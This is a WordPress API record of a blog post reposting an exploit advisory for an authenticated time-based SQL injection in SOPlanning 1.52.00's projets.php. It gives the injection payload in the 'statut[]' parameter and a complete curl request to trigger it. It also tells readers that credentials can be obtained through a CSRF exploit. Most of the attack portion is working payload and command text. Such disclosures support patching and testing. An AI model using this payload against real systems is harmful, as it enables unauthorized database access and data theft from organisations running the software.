{"id":56648,"date":"2024-05-03T19:09:53","date_gmt":"2024-05-03T15:09:53","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178436\/soplanning15200-sql.txt"},"modified":"2024-05-03T19:09:53","modified_gmt":"2024-05-03T15:09:53","slug":"soplanning-1-52-00-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/soplanning-1-52-00-sql-injection\/","title":{"rendered":"SOPlanning 1.52.00 SQL Injection"},"content":{"rendered":"<p>Exploit Title: SOPlanning v1.52.00 &#8216;projets.php&#8217; SQLi<\/p>\n<p>Application: SOPlanning<\/p>\n<p>Version: 1.52.00<\/p>\n<p>Date: 4\/22\/24<\/p>\n<p>Exploit Author: Joseph McPeters (Liquidsky)<\/p>\n<p>Vendor Homepage: https:\/\/www.soplanning.org\/en\/<\/p>\n<p>Software Link: https:\/\/sourceforge.net\/projects\/soplanning\/<\/p>\n<p>Tested on: Linux<\/p>\n<p>CVE: Not yet assigned<\/p>\n<p>Description: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the &#8216;projets.php&#8217; page.<\/p>\n<p>Instructions: Authenticate to the host; the credentials can be obtained using a CSRF exploit (more info included). 
Once valid credentials are obtained, use either a GET or POST request to send the parameters that trigger the SQLi.<\/p>\n<p>Vulnerable request parameters for request to &#8220;\/www\/projets.php&#8221;:<\/p>\n<p>filtreGroupeProjet=1&amp;statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&amp;rechercheProjet=test<\/p>\n<p>The above parameters can be sent in either a valid GET or POST request to trigger the SQLi.<\/p>\n<p>Example Curl Request To Re-Test SQLi:<\/p>\n<p>curl -i -s -k -X $'POST' \\<br \/>-H $'Host: 127.0.0.1' -H $'User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0' -H $'Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application\/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http:\/\/127.0.0.1' -H $'Connection: close' -H $'Referer: http:\/\/127.0.0.1\/soplanning\/www\/projets.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' \\<br \/>-b $'dateDebut=23\/04\/2024; dateFin=23\/06\/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=ovpbclvbc87uh7anfbq2luf9bi; soplanningplanning_=hhrtf0rgs562vm8rhn5i641481; baseLigne=users; baseColonne=jours; afficherTableauRecap=1; masquerLigneVide=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%5D' \\<br \/>--data-binary 
$'filtreGroupeProjet=1&amp;statut[]=todo\\'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+\\'Liquidsky\\'=\\'Liquidsky&amp;rechercheProjet=test' \\<br \/>$'http:\/\/127.0.0.1\/soplanning\/www\/projets.php'<\/p>\n<p>Note: The cookies must belong to an authenticated session and the request must be valid for the SQLi to trigger. This curl request can be used with a proxy to reconstruct a valid request.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Title: SOPlanning v1.52.00 &#8216;projets.php&#8217; SQLi Application: SOPlanning Version: 1.52.00 Date: 4\/22\/24 Exploit Author: Joseph McPeters (Liquidsky) Vendor Homepage: https:\/\/www.soplanning.org\/en\/ Software Link: https:\/\/sourceforge.net\/projects\/soplanning\/ Tested on: Linux CVE: Not yet assigned Description: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the &#8216;projets.php&#8217; page. Instructions: Authenticate to the host; the credentials can be obtained using a 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56648","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56648","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56648"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56648\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56648"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56648"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56648"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}